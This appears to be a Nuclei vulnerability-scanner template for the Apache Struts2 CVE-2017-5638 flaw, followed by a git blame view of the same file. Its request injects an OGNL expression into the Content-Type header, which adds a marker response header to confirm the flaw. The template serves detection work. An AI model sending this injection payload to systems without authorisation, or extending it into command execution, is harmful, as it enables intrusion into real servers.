nuclei-templates/cves/2017/CVE-2017-5638.yaml

id: CVE-2017-5638
info:
  author: Random_Robbie
  name: Apache Struts2 RCE
  severity: critical
  description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
  tags: cve,cve2017,struts,rce,apache
  reference: https://github.com/mazen160/struts-pwn

requests:
  - raw:
      - |
          GET / HTTP/1.1
          Host: {{Hostname}}
          Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
          Accept-Language: en
          Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
          Connection: Keep-Alive
          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
          Pragma: no-cache
          Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*

    matchers:
      - type: word
        words:
          - "X-Hacker: Bounty Plz"
        part: header
-												cve id updates

											
										
										
											2021-01-02 05:02:50 +00:00
+								id: CVE-2017-5638
-												Create CVE-2017-5638.yaml
											
										
										
											2020-08-19 13:13:31 +00:00
+								info:
-												Updated author names

											
										
										
											2021-06-09 12:20:56 +00:00
+								  author: Random_Robbie
-												misc updates

											
										
										
											2021-03-06 06:26:16 +00:00
+								  name: Apache Struts2 RCE
-												Create CVE-2017-5638.yaml
											
										
										
											2020-08-19 13:13:31 +00:00
+								  severity: critical
-												fix minor issue

fix issue from yamllint.

											
										
										
											2020-08-27 16:19:24 +00:00
+								  description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
-												improved matcher and tags update

											
										
										
											2021-02-22 07:01:32 +00:00
+								  tags: cve,cve2017,struts,rce,apache
-												Description and References

											
										
										
											2021-04-18 13:02:50 +00:00
+								  reference: https://github.com/mazen160/struts-pwn
-												Create CVE-2017-5638.yaml
											
										
										
											2020-08-19 13:13:31 +00:00
 								requests:
 								  - raw:
 								      - |
 								          GET / HTTP/1.1
 								          Host: {{Hostname}}
 								          Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
 								          Accept-Language: en
 								          Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
 								          Connection: Keep-Alive
 								          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
 								          Pragma: no-cache
 								          Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
 								    matchers:
 								      - type: word
 								        words:
-												Update CVE-2017-5638.yaml

											
										
										
											2020-08-30 04:14:52 +00:00
+								          - "X-Hacker: Bounty Plz"
 								        part: header